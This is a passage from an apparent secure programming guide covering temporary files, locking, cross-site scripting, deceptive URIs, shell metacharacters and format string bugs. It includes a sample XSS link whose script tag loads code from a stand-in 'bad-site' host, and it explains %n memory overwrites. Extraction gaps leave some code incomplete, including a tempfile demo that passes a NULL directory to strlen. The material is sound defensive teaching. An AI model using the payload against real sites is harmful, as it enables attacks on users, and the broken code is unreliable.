Checking “before” you create the file doesn’t work, because after the check occurs, but before creation,
another process can create that file with that filename. Using an “unpredictable” or “unique” filename
doesn’t work in general, because another process can often repeatedly guess until it succeeds. Once you
create the file atomically, you must alway use the returned file descriptor (or file stream, if created from
the file descriptor using routines like fdopen()). You must never re-open the file, or use any operations
that use the filename as a parameter - always use the file descriptor or associated stream. Otherwise, the
tmpwatch race issues noted above will cause problems. You can’t even create the file, close it, and
re-open it, even if the permissions limit who can open it. Note that comparing the descriptor and a
reopened file to verify inode numbers, creation times or file ownership is not sufficient - please refer to
"Symlinks and Cryogenic Sleep" by Olaf Kirch.
Fundamentally, to create a temporary file in a shared (sticky) directory, you must repetitively: (1) create a
“random” filename, (2) open it using O_CREAT | O_EXCL and very narrow permissions (which
atomically creates the file and fails if it’s not created), and (3) stop repeating when the open succeeds.
According to the 1997 “Single Unix Specification”, the preferred method for creating an arbitrary
temporary file (using the C interface) is tmpfile(3). The tmpfile(3) function creates a temporary file and
opens a corresponding stream, returning that stream (or NULL if it didn’t). Unfortunately, the
specification doesn’t make any guarantees that the file will be created securely. In earlier versions of this
book, I stated that I was concerned because I could not assure myself that all implementations do this
securely. I’ve since found that older System V systems have an insecure implementation of tmpfile(3) (as
well as insecure implementations of tmpnam(3) and tempnam(3)), so on at least some systems it’s
absolutely useless. Library implementations of tmpfile(3) should securely create such files, of course, but
users don’t always realize that their system libraries have this security flaw, and sometimes they can’t do
anything about it.
Kris Kennaway recommends using mkstemp(3) for making temporary files in general. His rationale is
that you should use well-known library functions to perform this task instead of rolling your own
functions, and that this function has well-known semantics. This is certainly a reasonable position. I
would add that, if you use mkstemp(3), be sure to use umask(2) to limit the resulting temporary file
permissions to only the owner. This is because some implementations of mkstemp(3) (basically older
ones) make such files readable and writable by all, creating a condition in which an attacker can read or
write private data in this directory. A minor nuisance is that mkstemp(3) doesn’t directly support the
environment variables TMP or TMPDIR (as discussed below), so if you want to support them you have
to add code to do so. Here’s a program in C that demonstrates how to use mkstemp(3) for this purpose,
both directly and when adding support for TMP and TMPDIR:
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
97
Chapter 7. Design Your Program for Security
void failure(msg) {
fprintf(stderr, "%s\n", msg);
exit(1);
}
/*
* Given a "pattern" for a temporary filename
* (starting with the directory location and ending in XXXXXX),
* create the file and return it.
* This routines unlinks the file, so normally it won’t appear in
* a directory listing.
* The pattern will be changed to show the final filename.
*/
/*
* Given a "tag" (a relative filename ending in XXXXXX),
* create a temporary file using the tag. The file will be created
* in the directory specified in the environment variables
* TMPDIR or TMP, if defined and we aren’t setuid/setgid, otherwise
* it will be created in /tmp. Note that root (and su’d to root)
* _will_ use TMPDIR or TMP, if defined.
*
*/
FILE *smart_create_tempfile(char *tag)
{
char *tmpdir = NULL;
char *pattern;
FILE *result;
98
Chapter 7. Design Your Program for Security
pattern = malloc(strlen(tmpdir)+strlen(tag)+2);
if (!pattern) {
failure("Could not malloc tempfile pattern");
}
strcpy(pattern, tmpdir);
strcat(pattern, "/");
strcat(pattern, tag);
result = create_tempfile(pattern);
free(pattern);
return result;
}
main() {
int c;
FILE *demo_temp_file1;
FILE *demo_temp_file2;
char demo_temp_filename1[] = "/tmp/demoXXXXXX";
char demo_temp_filename2[] = "second-demoXXXXXX";
demo_temp_file1 = create_tempfile(demo_temp_filename1);
demo_temp_file2 = smart_create_tempfile(demo_temp_filename2);
fprintf(demo_temp_file2, "This is a test.\n");
printf("Printing temporary file contents:\n");
rewind(demo_temp_file2);
while ( (c=fgetc(demo_temp_file2)) != EOF) {
putchar(c);
}
putchar(’\n’);
printf("Exiting; you’ll notice that there are no temporary files on exit.\n");
}
Kennaway states that if you can’t use mkstemp(3), then make yourself a directory using mkdtemp(3),
which is protected from the outside world. However, as Michal Zalewski notes, this is a bad idea if there
are tmp cleaners in use; instead, use a directory inside the user’s HOME. Finally, if you really have to use
the insecure mktemp(3), use lots of X’s - he suggests 10 (if your libc allows it) so that the filename can’t
easily be guessed (using only 6 X’s means that 5 are taken up by the PID, leaving only one random
character and allowing an attacker to mount an easy race condition). Note that this is fundamentally
insecure, so you should normally not do this. I add that you should avoid tmpnam(3) as well - some of its
uses aren’t reliable when threads are present, and it doesn’t guarantee that it will work correctly after
TMP_MAX uses (yet most practical uses must be inside a loop).
In general, you should avoid using the insecure functions such as mktemp(3) or tmpnam(3), unless you
take specific measures to counter their insecurities or test for a secure library implementation as part of
your installation routines. If you ever want to make a file in /tmp or a world-writable directory (or
group-writable, if you don’t trust the group) and don’t want to use mk*temp() (e.g. you intend for the file
to be predictably named), then always use the O_CREAT and O_EXCL flags to open() and check the
return value. If you fail the open() call, then recover gracefully (e.g. exit).
The GNOME programming guidelines recommend the following C code when creating filesystem
objects in shared (temporary) directories to securely open temporary files [Quintero 2000]:
99
Chapter 7. Design Your Program for Security
char *filename;
int fd;
do {
filename = tempnam (NULL, "foo");
fd = open (filename, O_CREAT | O_EXCL | O_TRUNC | O_RDWR, 0600);
free (filename);
} while (fd == -1);
Note that, although the insecure function tempnam(3) is being used, it is wrapped inside a loop using
O_CREAT and O_EXCL to counteract its security weaknesses, so this use is okay. Note that you need to
free() the filename. You should close() and unlink() the file after you are done. If you want to use the
Standard C I/O library, you can use fdopen() with mode "w+b" to transform the file descriptor into a
FILE *. Note that this approach won’t work over NFS version 2 (v2) systems, because older NFS doesn’t
correctly support O_EXCL. Note that one minor disadvantage to this approach is that, since tempnam
can be used insecurely, various compilers and security scanners may give you spurious warnings about
its use. This isn’t a problem with mkstemp(3).
If you need a temporary file in a shell script, you’re probably best off using pipes, using a local directory
(e.g., something inside the user’s home directory), or in some cases using the current directory. That way,
there’s no sharing unless the user permits it. If you really want/need the temporary file to be in a shared
directory like /tmp, do not use the traditional shell technique of using the process id in a template and
just creating the file using normal operations like ">". Shell scripts can use "$$" to indicate the PID, but
the PID can be easily determined or guessed by an attacker, who can then pre-create files or links with
the same name. Thus the following "typical" shell script is unsafe:
If you need a temporary file or directory in a shell script, and you want it in /tmp, a solution sometimes
suggested is to use mktemp(1), which is intended for use in shell scripts (note that mktemp(1) and
mktemp(3) are different things). However, as Michal Zalewski notes, this is insecure in many
environments that run tmp cleaners; the problem is that when a privileged program sweeps through a
temporary directory, it will probably expose a race condition. Even if this weren’t true, I do not
recommend using shell scripts that create temporary files in shared directories; creating such files in
private directories or using pipes instead is generally preferable, even if you’re sure your tmpwatch
program is okay (or that you have no local users). If you must use mktemp(1), note that mktemp(1) takes
a template, then creates a file or directory using O_EXCL and returns the resulting name; thus,
mktemp(1) won’t work on NFS version 2 filesystems. Here are some examples of correct use of
mktemp(1) in Bourne shell scripts; these examples are straight from the mktemp(1) man page:
100
Chapter 7. Design Your Program for Security
TMPFILE=‘mktemp -q /tmp/$0.XXXXXX‘
if [ $? -ne 0 ]; then
echo "$0: Can’t create temp file, exiting..."
exit 1
fi
Perl programmers should use File::Temp, which tries to provide a cross-platform means of securely
creating temporary files. However, read the documentation carefully on how to use it properly first; it
includes interfaces to unsafe functions as well. I suggest explicitly setting its safe_level to HIGH; this
will invoke additional security checks. The Perl 5.8 documentation of File::Temp is available on-line.
Don’t reuse a temporary filename (i.e. remove and recreate it), no matter how you obtained the “secure”
temporary filename in the first place. An attacker can observe the original filename and hijack it before
you recreate it the second time. And of course, always use appropriate file permissions. For example,
only allow world/group access if you need the world or a group to access the file, otherwise keep it mode
0600 (i.e., only the owner can read or write it).
Clean up after yourself, either by using an exit handler, or making use of UNIX filesystem semantics and
unlink()ing the file immediately after creation so the directory entry goes away but the file itself remains
accessible until the last file descriptor pointing to it is closed. You can then continue to access it within
your program by passing around the file descriptor. Unlinking the file has a lot of advantages for code
maintenance: the file is automatically deleted, no matter how your program crashes. It also decreases the
likelihood that a maintainer will insecurely use the filename (they need to use the file descriptor instead).
The one minor problem with immediate unlinking is that it makes it slightly harder for administrators to
see how disk space is being used, since they can’t simply look at the file system by name.
You might consider ensuring that your code for Unix-like systems respects the environment variables
TMP or TMPDIR if the provider of these variable values is trusted. By doing so, you make it possible for
users to move their temporary files into an unshared directory (and eliminating the problems discussed
here), such as a subdirectory inside their home directory. Recent versions of Bastille can set these
variables to reduce the sharing between users. Unfortunately, many users set TMP or TMPDIR to a
shared directory (say /tmp), so your secure program must still correctly create temporary files even if
these environment variables are set. This is one advantage of the GNOME approach, since at least on
some systems tempnam(3) automatically uses TMPDIR, while the mkstemp(3) approach requires more
code to do this. Please don’t create yet more environment variables for temporary directories (such as
TEMP), and in particular don’t create a different environment name for each application (e.g., don’t use
"MYAPP_TEMP"). Doing so greatly complicates managing systems, and users wanting a special
temporary directory for a specific application can just set the environment variable specially when
running that particular application. Of course, if these environment variables might have been set by an
untrusted source, you should ignore them - which you’ll do anyway if you follow the advice in Section
5.4.3.
These techniques don’t work if the temporary directory is remotely mounted using NFS version 2
(NFSv2), because NFSv2 doesn’t properly support O_EXCL. See Section 7.11.2.1 for more information.
NFS version 3 and later properly support O_EXCL; the simple solution is to ensure that temporary
directories are either local or, if mounted using NFS, mounted using NFS version 3 or later. There is a
technique for safely creating temporary files on NFS v2, involving the use of link(2) and stat(2), but it’s
complex; see Section 7.11.2.1 which has more information about this.
101
Chapter 7. Design Your Program for Security
As an aside, it’s worth noting that FreeBSD has recently changed the mk*temp() family to get rid of the
PID component of the filename and replace the entire thing with base-62 encoded randomness. This
drastically raises the number of possible temporary files for the "default" usage of 6 X’s, meaning that
even mktemp(3) with 6 X’s is reasonably (probabilistically) secure against guessing, except under very
frequent usage. However, if you also follow the guidance here, you’ll eliminate the problem they’re
addressing.
Much of this information on temporary files was derived from Kris Kennaway’s posting to Bugtraq about
temporary files on December 15, 2000.
I should note that the Openwall Linux patch from http://www.openwall.com/linux/ includes an optional
“temporary file directory” policy that counters many temporary file based attacks. The Linux Security
Module (LSM) project includes an "owlsm" module that implements some of the OpenWall ideas, so
Linux Kernels with LSM can quickly insert these rules into a running system. When enabled, it has two
protections:
• Hard links: Processes may not make hard links to files in certain cases. The OpenWall documentation
states that “Processes may not make hard links to files they do not have write access to.” In the LSM
version, the rules are as follows: if both the process’ uid and fsuid (usually the same as the euid) is is
different from the linked-to-file’s uid, the process uid is not root, and the process lacks the FOWNER
capability, then the hard link is forbidden. The check against the process uid may be dropped someday
(they are work-arounds for the atd(8) program), at which point the rules would be: if both the process’
fsuid (usually the same as the euid) is is different from the linked-to-file’s uid and and the process
lacks the FOWNER capability, then the hard link is forbidden. In other words, you can only create
hard links to files you own, unless you have the FOWNER capability.
• Symbolic links (symlinks): Certain symlinks are not followed. The original OpenWall documentation
states that “root processes may not follow symlinks that are not owned by root”, but the actual rules
(from looking at the code) are more complicated. In the LSM version, if the directory is sticky ("+t"
mode, used in shared directories like /tmp), symlinks are not followed if the symlink was created by
anyone other than either the owner of the directory or the current process’ fsuid (which is usually the
effective uid).
Many systems do not implement this openwall policy, so you can’t depend on this in general protecting
your system. However, I encourage using this policy on your own system, and please make sure that your
application will work when this policy is in place.
7.11.2. Locking
There are often situations in which a program must ensure that it has exclusive rights to something (e.g.,
a file, a device, and/or existence of a particular server process). Any system which locks resources must
deal with the standard problems of locks, namely, deadlocks (“deadly embraces”), livelocks, and
releasing “stuck” locks if a program doesn’t clean up its locks. A deadlock can occur if programs are
stuck waiting for each other to release resources. For example, a deadlock would occur if process 1 locks
resources A and waits for resource B, while process 2 locks resource B and waits for resource A. Many
deadlocks can be prevented by simply requiring all processes that lock multiple resources to lock them in
the same order (e.g., alphabetically by lock name).
102
Chapter 7. Design Your Program for Security
103
Chapter 7. Design Your Program for Security
It’s important that the programs which are cooperating using files to represent the locks use the same
directory, not just the same directory name. This is an issue with networked systems: the FHS explicitly
notes that /var/run and /var/lock are unshareable, while /var/mail is shareable. Thus, if you want the lock
to work on a single machine, but not interfere with other machines, use unshareable directories like
/var/run (e.g., you want to permit each machine to run its own server). However, if you want all machines
sharing files in a network to obey the lock, you need to use a directory that they’re sharing; /var/mail is
one such location. See FHS section 2 for more information on this subject.
104
Chapter 7. Design Your Program for Security
by requiring that the sender use a “trusted” port number (a number less that 1024). The problem is that in
many environments an attacker can forge these values.
In some environments, checking these values (e.g., the sending machine IP address and/or port) can have
some value, so it’s not a bad idea to support such checking as an option in a program. For example, if a
system runs behind a firewall, the firewall can’t be breached or circumvented, and the firewall stops
external packets that claim to be from the inside, then you can claim that any packet saying it’s from the
inside really does. Note that you can’t be sure the packet actually comes from the machine it claims it
comes from - so you’re only countering external threats, not internal threats. However, broken firewalls,
alternative paths, and mobile code make even these assumptions suspect.
The problem is supporting untrustworthy information as the only way to authenticate someone. If you
need a trustworthy channel over an untrusted network, in general you need some sort of cryptologic
service (at the very least, a cryptologically safe hash). See Section 11.5 for more information on
cryptographic algorithms and protocols. If you’re implementing a standard and inherently insecure
protocol (e.g., ftp and rlogin), provide safe defaults and document the assumptions clearly.
The Domain Name Server (DNS) is widely used on the Internet to maintain mappings between the
names of computers and their IP (numeric) addresses. The technique called “reverse DNS” eliminates
some simple spoofing attacks, and is useful for determining a host’s name. However, this technique is not
trustworthy for authentication decisions. The problem is that, in the end, a DNS request will be sent
eventually to some remote system that may be controlled by an attacker. Therefore, treat DNS results as
an input that needs validation and don’t trust it for serious access control.
Arbitrary email (including the “from” value of addresses) can be forged as well. Using digital signatures
is a method to thwart many such attacks. A more easily thwarted approach is to require emailing back
and forth with special randomly-created values, but for low-value transactions such as signing onto a
public mailing list this is usually acceptable.
Note that in any client/server model, including CGI, that the server must assume that the client (or
someone interposing between the client and server) can modify any value. For example, so-called
“hidden fields” and cookie values can be changed by the client before being received by CGI programs.
These cannot be trusted unless special precautions are taken. For example, the hidden fields could be
signed in a way the client cannot forge as long as the server checks the signature. The hidden fields could
also be encrypted using a key only the trusted server could decrypt (this latter approach is the basic idea
behind the Kerberos authentication system). InfoSec labs has further discussion about hidden fields and
applying encryption at http://www.infoseclabs.com/mschff/mschff.htm. In general, you’re better off
keeping data you care about at the server end in a client/server model. In the same vein, don’t depend on
HTTP_REFERER for authentication in a CGI program, because this is sent by the user’s browser (not
the web server).
This issue applies to data referencing other data, too. For example, HTML or XML allow you to include
by reference other files (e.g., DTDs and style sheets) that may be stored remotely. However, those
external references could be modified so that users see a very different document than intended; a style
sheet could be modified to “white out” words at critical locations, deface its appearance, or insert new
text. External DTDs could be modified to prevent use of the document (by adding declarations that break
validation) or insert different text into documents [St. Laurent 2000].
105
Chapter 7. Design Your Program for Security
106
Chapter 7. Design Your Program for Security
making sure that the web address is very simple and not normally misspelled (so misspelling it is
unlikely). You might also want to gain ownership of some “similar” sounding DNS names, and search
for other such DNS names and material to find attackers. Some versions of Microsoft’s Internet Explorer
won’t allow the "@" symbol at all in URLs; this is an unfortunate restriction, but probably good for
security. Another less draconian solution would have been to put up a warning dialogue, clearly
displaying the real site name and user name.
107
Chapter 7. Design Your Program for Security
creating an “infinite” number of windows), and even very destructive attacks (by inserting attacks on
security vulnerabilities such as scripting languages or buffer overflows in browsers). By embedding
malicious FORM tags at the right place, an intruder may even be able to trick users into revealing
sensitive information (by modifying the behavior of an existing form). Or, by embedding scripts, an
intruder can cause no end of problems. This is by no means an exhaustive list of problems, but hopefully
this is enough to convince you that this is a serious problem.
Most “discussion boards” have already discovered this problem, and most already take steps to prevent it
in text intended to be part of a multiperson discussion. Unfortunately, many web application developers
don’t realize that this is a much more general problem. Every data value that is sent from one user to
another can potentially be a source for cross-site malicious posting, even if it’s not an “obvious” case of
an area where arbitrary HTML is expected. The malicious data can even be supplied by the user himself,
since the user may have been fooled into supplying the data via another site. Here’s an example (from
CERT) of an HTML link that causes the user to send malicious data to another site:
<A HREF="http://example.com/comment.cgi?mycomment=<SCRIPT
SRC=’http://bad-site/badfile’></SCRIPT>"> Click here</A>
In short, a web application cannot accept input (including any form data) without checking, filtering, or
encoding it. You can’t even pass that data back to the same user in many cases in web applications, since
another user may have surreptitiously supplied the data. Even if permitting such material won’t hurt your
system, it will enable your system to be a conduit of attacks to your users. Even worse, those attacks will
appear to be coming from your system.
CERT describes the problem this way in their advisory:
A web site may inadvertently include malicious HTML tags or script in a dynamically generated page based on
unvalidated input from untrustworthy sources (CERT Advisory CA-2000-02, Malicious HTML Tags
Embedded in Client Web Requests).
More information from CERT about this is available at
http://www.cert.org/archive/pdf/cross_site_scripting.pdf. The paper The Anatomy of Cross Site Scripting
discusses some of XSS’s ramifications.
108
Chapter 7. Design Your Program for Security
Warning - in many cases these techniques can be subverted unless you’ve also gained control over the
character encoding of the output. Otherwise, an attacker could use an “unexpected” character encoding
to subvert the techniques discussed here. Thankfully, this isn’t hard; gaining control over output
character encoding is discussed in Section 9.5.
One minor defense, that’s often worth doing, is the "HttpOnly" flag for cookies. Scripts that run in a web
browser cannot access cookie values that have the HttpOnly flag set (they just get an empty value
instead). This is currently implemented in Microsoft Internet Explorer, and I expect Mozilla/Netscape to
implement this soon too. You should set HttpOnly on for any cookie you send, unless you have scripts
that need the cookie, to counter certain kinds of cross-site scripting (XSS) attacks. However, the
HttpOnly flag can be circumvented in a variety of ways, so using as your primary defense is
inappropriate. Instead, it’s a helpful secondary defense that may help save you in case your application is
written incorrectly.
The first subsection below discusses how to identify special characters that need to be filtered, encoded,
or validated. This is followed by subsections describing how to filter or encode these characters. There’s
no subsection discussing how to validate data in general, however, for input validation in general see
Chapter 5, and if the input is straight HTML text or a URI, see Section 5.13. Also note that your web
application can receive malicious cross-postings, so non-queries should forbid the GET protocol (see
Section 5.14).
• In the content of a block-level element (e.g., in the middle of a paragraph of text in HTML or a block
in XML):
• In attribute values:
• In attribute values enclosed with double quotes, the double quotes are special because they mark the
end of the attribute value.
• In attribute values enclosed with single quote, the single quotes are special because they mark the
end of the attribute value. XML’s definition allows single quotes, but I’ve been told that some XML
parsers don’t handle them correctly, so you might avoid using single quotes in XML.
• Attribute values without any quotes make the white-space characters such as space and tab special.
Note that these aren’t legal in XML either, and they make more characters special. Thus, I
recommend against unquoted attributes if you’re using dynamically generated values in them.
• "&" is special when used in conjunction with some attributes because it introduces a character
entity.
109
Chapter 7. Design Your Program for Security
• In URLs, for example, a search engine might provide a link within the results page that the user can
click to re-run the search. This can be implemented by encoding the search query inside the URL.
When this is done, it introduces additional special characters:
• Space, tab, and new line are special because they mark the end of the URL.
• "&" is special because it introduces a character entity or separates CGI parameters.
• Non-ASCII characters (that is, everything above 128 in the ISO-8859-1 encoding) aren’t allowed in
URLs, so they are all special here.
• The "%" must be filtered from input anywhere parameters encoded with HTTP escape sequences
are decoded by server-side code. The percent must be filtered if input such as
"%68%65%6C%6C%6F" becomes "hello" when it appears on the web page in question.
• Within the body of a <SCRIPT> </SCRIPT> the semicolon, parenthesis, curly braces, and new line
should be filtered in situations where text could be inserted directly into a preexisting script tag.
• Server-side scripts that convert any exclamation characters (!) in input to double-quote characters (")
on output might require additional filtering.
Note that, in general, the ampersand (&) is special in HTML and XML.
7.16.2.2. Filtering
One approach to handling these special characters is simply eliminating them (usually during input or
output).
If you’re already validating your input for valid characters (and you generally should), this is easily done
by simply omitting the special characters from the list of valid characters. Here’s an example in Perl of a
filter that only accepts legal characters, and since the filter doesn’t accept any special characters other
than the space, it’s quite acceptable for use in areas such as a quoted attribute:
However, if you really want to strip away only the smallest number of characters, then you could create a
subroutine to remove just those characters:
sub remove_special_chars {
local($s) = @_;
$s =~ s/[\<\>\"\’\%\;\(\)\&\+]//g;
return $s;
}
# Sample use:
$data = &remove_special_chars($data);
110
Chapter 7. Design Your Program for Security
• A numeric character reference looks like “&#D;”, where D is a decimal number, or “&#xH;” or
“&#XH;”, where H is a hexadecimal number. The number given is the ISO 10646 character id (which
has the same character values as Unicode). Thus И is the Cyrillic capital letter "I". The
hexadecimal system isn’t supported in the SGML standard (ISO 8879), so I’d suggest using the
decimal system for output. Also, although SGML specification permits the trailing semicolon to be
omitted in some circumstances, in practice many systems don’t handle it - so always include the
111
Chapter 7. Design Your Program for Security
trailing semicolon.
• A character entity reference does the same thing but uses mnemonic names instead of numbers. For
example, "<" represents the < sign. If you’re generating HTML, see the HTML specification which
lists all mnemonic names.
Either system (numeric or character entity) works; I suggest using character entity references for “<”,
“>”, “&”, and “"” because it makes your code (and output) easier for humans to understand. Other than
that, it’s not clear that one or the other system is uniformly better. If you expect humans to edit the output
by hand later, use the character entity references where you can, otherwise I’d use the decimal numeric
character references just because they’re easier to program. This encoding scheme can be quite
inefficient for some languages (especially Asian languages); if that is your primary content, you might
choose to use a different character encoding (charset), filter on the critical characters (e.g., "<") and
ensure that no alternative encodings for critical characters are allowed.
URIs have their own encoding scheme, commonly called “URL encoding.” In this system, characters not
permitted in URLs are represented using a percent sign followed by its two-digit hexadecimal value. To
handle all of ISO 10646 (Unicode), it’s recommended to first translate the codes to UTF-8, and then
encode it. See Section 5.13.4 for more about validating URIs.
http://[email protected]
If a user clicked on that URI, they might think that they’re going to Bloomberg (who provide financial
commodities news), but instead they’re going to www.badguy.com (and providing the username
www.bloomberg.com, which www.badguy.com will conveniently ignore). If the badguy.com website
then imitated the bloomberg.com site, a user might be convinced that they’re seeing the real thing (and
make investment decisions based on attacker-controlled information). This depends on URIs being used
in an unusual way - clickable URIs can have usernames, but usually don’t. One solution for this case is
for the web browser to detect such unusual URIs and create a pop-up confirmation widget, saying “You
are about to log into www.badguy.com as user www.bloomberg.com; do you wish to proceed?” If the
112
Chapter 7. Design Your Program for Security
widget allows the user to change these entries, it provides additional functionality to the user as well as
providing protection against that attack.
Another example is homographs, particularly international homographs. Certain letters look similar to
each other, and these can be exploited as well. For example, since 0 (zero) and O (the letter O) look
similar to each other, users may not realize that WWW.BLOOMBERG.COM and
WWW.BL00MBERG.COM are different web addresses. Other similar-looking letters include 1 (one)
and l (lower-case L). If international characters are allowed, the situation is worse. For example, many
Cyrillic letters look essentially the same as Roman letters, but the computer will treat them differently.
Currently most systems don’t allow international characters in host names, but for various good reasons
it’s widely agreed that support for them will be necessary in the future. One proposed solution has been
to diplay letters from different code regions using different colors - that way, users get more information
visually. If the users look at URI, they will hopefully notice the strange coloring. [Gabrilovich 2002] The
page Phishing - Browser-based Defences provides another set of possible defenses against this attack.
However, this does show the essence of a semantic attack - it’s difficult to defend against, precisely
because the computers are working correctly.
113
Chapter 8. Carefully Call Out to Other
Resources
Do not put your trust in princes, in
mortal men, who cannot save.
Psalms 146:3 (NIV)
Practically no program is truly self-contained; nearly all programs call out to other programs for
resources, such as programs provided by the operating system, software libraries, and so on. Sometimes
this calling out to other resources isn’t obvious or involves a great deal of “hidden” infrastructure which
must be depended on, e.g., the mechanisms to implement dynamic libraries. Clearly, you must be careful
about what other resources your program trusts and you must make sure that the way you send requests
to them.
114
Chapter 8. Carefully Call Out to Other Resources
115
Chapter 8. Carefully Call Out to Other Resources
are sent to the shell, then their special interpretation will be used unless escaped; this fact can be used to
break programs. According to the WWW Security FAQ [Stein 1999, Q37], these metacharacters are:
The # character is a comment character, and thus is also a metacharacter. The separator values can be
changed by setting the IFS environment variable, but if you can’t trust the source of this variable you
should have thrown it out or reset it anyway as part of your environment variable processing.
Unfortunately, in real life this isn’t a complete list. Here are some other characters that can be
problematic:
• ’!’ means “not” in an expression (as it does in C); if the return value of a program is tested, prepending
! could fool a script into thinking something had failed when it succeeded or vice versa. In some shells,
the "!" also accesses the command history, which can cause real problems. In bash, this only occurs
for interactive mode, but tcsh (a csh clone found in some Linux distributions) uses "!" even in scripts.
• ’#’ is the comment character; all further text on the line is ignored.
• ’-’ can be misinterpreted as leading an option (or, as - -, disabling all further options). Even if it’s in
the “middle” of a filename, if it’s preceded by what the shell considers as whitespace you may have a
problem.
• ’ ’ (space), ’\t’ (tab), ’\n’ (newline), ’\r’ (return), ’\v’ (vertical space), ’\f’ (form feed), and other
whitespace characters can have many dangerous effects. They can may turn a “single” filename into
multiple arguments, for example, or turn a single parameter into multiple parameter when stored.
Newline and return have a number of additional dangers, for example, they can be used to create
“spoofed” log entries in some programs, or inserted just before a separate command that is then
executed (if an underlying protocol uses newlines or returns as command separators).
• Other control characters (in particular, NIL) may cause problems for some shell implementations.
• Depending on your usage, it’s even conceivable that “.” (the “run in current shell”) and “=” (for setting
variables) might be worrisome characters. However, any example I’ve found so far where these are
issues have other (much worse) security problems.
Forgetting one of these characters can be disastrous, for example, many programs omit backslash as a
shell metacharacter [rfp 1999]. As discussed in the Chapter 5, a recommended approach by some is to
immediately escape at least all of these characters when they are input.
So simply creating a list of characters that are forbidden is a bad idea (because that is a blacklist). Instead,
identify the characters that are acceptable, and then forbid or correctly escape all others (a whitelist).
What makes the shell metacharacters particularly pervasive is that several important library calls, such as
popen(3) and system(3), are implemented by calling the command shell, meaning that they will be
affected by shell metacharacters too. Similarly, execlp(3) and execvp(3) may cause the shell to be called.
Many guidelines suggest avoiding popen(3), system(3), execlp(3), and execvp(3) entirely and use
execve(3) directly in C when trying to spawn a process [Galvin 1998b]. At the least, avoid using
system(3) when you can use the execve(3); since system(3) uses the shell to expand characters, there is
more opportunity for mischief in system(3). In a similar manner the Perl and shell backtick (‘) also call a
command shell; for more information on Perl see Section 10.2.
116
Chapter 8. Carefully Call Out to Other Resources
117
Chapter 8. Carefully Call Out to Other Resources
filename. A simple solution is to prefix all globs or filenames where needed with "./" so that they cannot
begin with "-". So for example, never use "*.pdf" to refer to a set of PDFs; use "./*.pdf".
Be careful about displaying or storing pathnames, since they can include newlines, tabs, escape (which
can begin terminal controls), or sequences that are not legal strings. On some systems, merely displaying
filenames can invoke terminal controls, which can then run commands with the privilege of the one
displaying.
For more detailed information, see Filenames and Pathnames in Shell: How to do it correctly.
118
Chapter 8. Carefully Call Out to Other Resources
trickier to handle; some old systems implement them as if they weren’t set, but simply filtering them
inhibits much international use. In this case, you need to look at the specifics of your situation.
A related problem is that the NIL character (character 0) can have surprising effects. Most C and C++
functions assume that this character marks the end of a string, but string-handling routines in other
languages (such as Perl and Ada95) can handle strings containing NIL. Since many libraries and kernel
calls use the C convention, the result is that what is checked is not what is actually used [rfp 1999].
When calling another program or referring to a file it may be wise to specify its full path (e.g,
/usr/bin/sort). For program calls, this will eliminate possible errors in calling the “wrong”
command, even if the PATH value is incorrectly set. For other file referents, this reduces problems from
“bad” starting directories.
119
Chapter 8. Carefully Call Out to Other Resources
suspended while the child is using its resources. The rationale is that in old BSD systems, fork(2) would
actually cause memory to be copied while vfork(2) would not. Linux never had this problem; because
Linux used copy-on-write semantics internally, Linux only copies pages when they changed (actually,
there are still some tables that have to be copied; in most circumstances their overhead is not significant).
Nevertheless, since some programs depend on vfork(2), recently Linux implemented the BSD vfork(2)
semantics (previously vfork(2) had been an alias for fork(2)).
There are a number of problems with vfork(2). From a portability point-of-view, the problem with
vfork(2) is that it’s actually fairly tricky for a process to not interfere with its parent, especially in
high-level languages. The “not interfering” requirement applies to the actual machine code generated,
and many compilers generate hidden temporaries and other code structures that cause unintended
interference. The result: programs using vfork(2) can easily fail when the code changes or even when
compiler versions change.
For secure programs it gets worse on Linux systems, because Linux (at least 2.2 versions through 2.2.17)
is vulnerable to a race condition in vfork()’s implementation. If a privileged process uses a
vfork(2)/execve(2) pair in Linux to execute user commands, there’s a race condition while the child
process is already running as the user’s UID, but hasn‘t entered execve(2) yet. The user may be able to
send signals, including SIGSTOP, to this process. Due to the semantics of vfork(2), the privileged parent
process would then be blocked as well. As a result, an unprivileged process could cause the privileged
process to halt, resulting in a denial-of-service of the privileged process’ service. FreeBSD and
OpenBSD, at least, have code to specifically deal with this case, so to my knowledge they are not
vulnerable to this problem. My thanks to Solar Designer, who noted and documented this problem in
Linux on the “security-audit” mailing list on October 7, 2000.
The bottom line with vfork(2) is simple: don’t use vfork(2) in your programs. This shouldn’t be difficult;
the primary use of vfork(2) is to support old programs that needed vfork’s semantics.
Web bugs are used extensively today by Internet advertising companies on Web pages and in HTML-based
email messages for tracking. They are typically 1-by-1 pixel in size to make them invisible on the screen to
disguise the fact that they are used for tracking. However, they could be any image (using the img tag); other
HTML tags that can implement web bugs, e.g., frames, form invocations, and scripts. By itself, invoking the
web bug will provide the “bugging” site the reader IP address, the page that the reader visited, and various
information about the browser; by also using cookies it’s often possible to determine the specific identify of the
120
Chapter 8. Carefully Call Out to Other Resources
121
Chapter 9. Send Information Back Judiciously
Do not answer a fool according to his
folly, or you will be like him yourself.
Proverbs 26:4 (NIV)
• If your program requires some sort of user authentication (e.g., you’re writing a network service or
login program), give the user as little information as possible before they authenticate. In particular,
avoid giving away the version number of your program before authentication. Otherwise, if a
particular version of your program is found to have a vulnerability, then users who don’t upgrade from
that version advertise to attackers that they are vulnerable.
• If your program accepts a password, don’t echo it back; this creates another way passwords can be
seen.
I recommend implementing audit logging early in development. Audit logs are really convenient for
debugging (because they are designed to record useful information without interfering with normal
operations), and you are more likely to include useful status information in the logs if they are developed
in parallel with the rest of the program.
122
Chapter 9. Send Information Back Judiciously
/* Wrong way: */
printf(string_from_untrusted_user);
/* Right ways: */
printf("%s", string_from_untrusted_user); /* safe */
fputs(string_from_untrusted_user); /* better for simple strings */
If an attacker controls the formatting information, an attacker can cause all sorts of mischief by carefully
selecting the format. The case of C’s printf() is a good example - there are lots of ways to possibly exploit
user-controlled format strings in printf(). These include buffer overruns by creating a long formatting
string (this can result in the attacker having complete control over the program), conversion specifications
that use unpassed parameters (causing unexpected data to be inserted), and creating formats which
produce totally unanticipated result values (say by prepending or appending awkward data, causing
problems in later use). A particularly nasty case is printf’s %n conversion specification, which writes the
number of characters written so far into the pointer argument; using this, an attacker can overwrite a
value that was intended for printing! An attacker can even overwrite almost arbitrary locations, since the
